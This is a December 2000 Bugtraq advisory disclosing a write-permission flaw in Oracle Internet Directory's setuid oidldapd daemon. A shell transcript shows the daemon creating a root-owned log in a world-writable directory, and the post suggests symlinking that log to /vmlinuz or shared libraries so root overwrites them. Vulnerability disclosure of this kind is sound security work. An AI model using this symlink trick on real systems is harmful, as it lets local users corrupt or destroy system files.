[18320] in bugtraq
vulnerability #2 in Oracle Internet Directory 2.1.1.1 in Oracle
daemon@ATHENA.MIT.EDU (Juan Manuel Pascual Escriba)
Fri Dec 22 13:22:08 2000
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="------------41AA4717992D7DFDD2A57E98"
Message-Id: <3A43210C.875511D7@plazasite.com>
Date: Fri, 22 Dec 2000 10:38:20 +0100
Reply-To: pask@PLAZASITE.COM
From: Juan Manuel Pascual Escriba <pask@PLAZASITE.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
--------------41AA4717992D7DFDD2A57E98
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
WWW.PLAZASITE.COM
System & Security Division
Title: Vulnerability in oidldapd in Oracle 8.1.7
Date: 11-12-2000
Platform: Only tested in Linux, but can be exported to others.
Impact: Any user compromise any file in local machine.
Author: Juan Manuel Pascual (pask@plazasite.com)
Status: Vendor Contacted answers received. Details Below
OVERVIEW:
oidldapd is a Oracle Internet Directory. Oracle Ldap Daemon. The
actual version is 2.1.1.1
PROBLEM SUMMARY:
There is a write permision checking error in oidldapd that can be
used by local
users to write any file in local machine.
IMPACT:
Any user with local access, can write any file.
SOLUTION:
Chmod -s ;-)))).
STATUS:
Vendor was contacted .
----------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba pask@plazasite.com
--
" In God We trust, Others We monitor "
-------------------------------------------------------------
Juan Manuel Pascual Escriba Administrador de Sistemas
PlazaSite S.A. c/ Tomas Bretsn 32-38
08950 Esplugues de Llobregat (Barcelona), SPAIN
Ph: +34 93 3717398 Fax: +34 93 3711968
mob: 667591142 Email: pask@plazasite.com
-------------------------------------------------------------
--------------41AA4717992D7DFDD2A57E98
Content-Type: text/plain; charset=us-ascii;
name="oidldapd-8.1.7.txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="oidldapd-8.1.7.txt"
This Feature seems to be new with oidldapd in OID 2.1.1.1/8.1.7 i couldnt
reproduce with oidldapd in OID 2.0.6.3 and seems to be very dangerous. Look at
this. In my system occurs the next:
my ORACLE_HOME=/work/oracle8ir3
oracle@dimoniet bin]$ cd /work/oracle8ir3/ldaplog
oracle@dimoniet log]$ ls -alc
total 12
drwxr-xrwx 2 oracle orainstall 4096 Dec 12 05:03 .
drwxr-xrwx 13 oracle orainstall 4096 Dec 10 18:50 ..
Ok .. nothing in logs ... lets go to execute oidldapd.
oracle@dimoniet log]$ /work/oracle8ir3/bin/oidldapd
oracle@dimoniet log]$ ls -alc
total 12
drwxr-xrwx 2 oracle orainstall 4096 Dec 12 05:03 .
drwxr-xrwx 13 oracle orainstall 4096 Dec 10 18:50 ..
-rw-r--r-- 1 root orainstall 86 Dec 12 05:26
oidldapd00.log
Ups ... owned by root ? ... no comment about .. what about ln -s /vmlinuz ./oidldapd00.log ? or shared libraries ?
--------------41AA4717992D7DFDD2A57E98--
